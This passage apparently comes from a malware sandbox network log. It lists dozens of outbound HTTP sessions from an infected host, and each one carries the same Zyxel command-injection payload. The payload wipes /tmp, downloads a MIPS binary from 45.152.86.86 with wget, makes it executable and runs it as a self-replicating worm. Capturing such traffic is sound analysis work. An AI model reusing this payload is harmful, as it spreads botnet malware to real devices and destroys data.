                                        Mar 31, 2024 09:20:16.091321945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        321192.168.2.234892873.223.159.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091355085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        322192.168.2.2338770217.90.142.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091403008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        323192.168.2.2358064167.114.164.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091430902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        324192.168.2.2336708116.168.11.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091481924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        325192.168.2.2337236194.186.70.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091531992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        326192.168.2.2350092207.159.140.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:17.084474087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        327192.168.2.235789450.25.181.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:17.084537983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        328192.168.2.2344282213.128.98.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:17.084585905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        329192.168.2.2359640182.238.54.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118360043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        330192.168.2.2341874207.95.37.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118402004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        331192.168.2.2357954220.11.103.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118433952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        332192.168.2.2342728160.98.116.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118474007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        333192.168.2.234757866.116.29.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118536949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        334192.168.2.234936669.122.176.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118590117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        335192.168.2.2345644155.58.218.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118623018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        336192.168.2.2351046179.46.26.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118654966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        337192.168.2.23554928.168.35.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118701935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        338192.168.2.23372504.194.115.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118756056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        339192.168.2.2346280125.238.194.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118798018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        340192.168.2.2357070198.234.14.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118841887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        341192.168.2.2335470105.195.0.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118887901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        342192.168.2.233630280.141.237.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118921995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        343192.168.2.2358290189.74.123.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.118979931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        344192.168.2.233885051.13.98.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119009972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        345192.168.2.234358468.220.101.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119041920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        346192.168.2.2343906121.128.7.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119077921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        347192.168.2.2342540174.30.157.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119131088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        348192.168.2.2354064125.96.152.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119182110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        349192.168.2.2342620223.125.77.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119219065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        350192.168.2.2336468161.72.29.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119282007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        351192.168.2.235658850.37.122.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119307041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        352192.168.2.23329202.240.88.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119348049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        353192.168.2.2343014207.214.138.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119402885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        354192.168.2.2355462177.221.127.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119442940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        355192.168.2.2352752147.229.42.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119491100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        356192.168.2.2344996163.103.39.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119522095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        357192.168.2.2343934156.240.200.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119585991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        358192.168.2.2339002128.110.129.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119626999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        359192.168.2.2351592107.150.9.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119671106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        360192.168.2.234415679.126.224.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119741917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        361192.168.2.234182487.13.198.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119770050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        362192.168.2.235108485.36.58.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119800091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        363192.168.2.233613061.122.197.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119848013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        364192.168.2.2334558134.222.201.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119909048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        365192.168.2.234830870.144.230.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119949102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        366192.168.2.2351734121.235.91.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.119987011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        367192.168.2.233563274.128.190.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120023012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        368192.168.2.2341366195.93.134.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120059967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        369192.168.2.234591468.104.38.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120115995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        370192.168.2.235574079.239.81.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120166063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        371192.168.2.2359262170.220.249.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120225906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        372192.168.2.233843869.80.243.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120281935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        373192.168.2.2354484196.187.14.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120336056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        374192.168.2.2358202116.45.70.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120385885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        375192.168.2.235483499.53.141.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120441914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        376192.168.2.2342218207.71.52.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120491028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        377192.168.2.23566542.29.195.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120527029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        378192.168.2.234753681.59.239.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120578051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        379192.168.2.2359652217.188.117.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120625973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        380192.168.2.235366243.242.185.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120688915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        381192.168.2.2335068133.32.62.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120738029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        382192.168.2.235253234.220.46.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120784044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        383192.168.2.234039482.181.42.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120807886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        384192.168.2.233357066.17.192.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120853901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        385192.168.2.235705449.127.166.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120889902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        386192.168.2.2333772146.6.173.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.120965004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        387192.168.2.2341332172.67.158.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121006966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        388192.168.2.2357724189.115.142.72443
                                        TimestampBytes transferredDirectionData
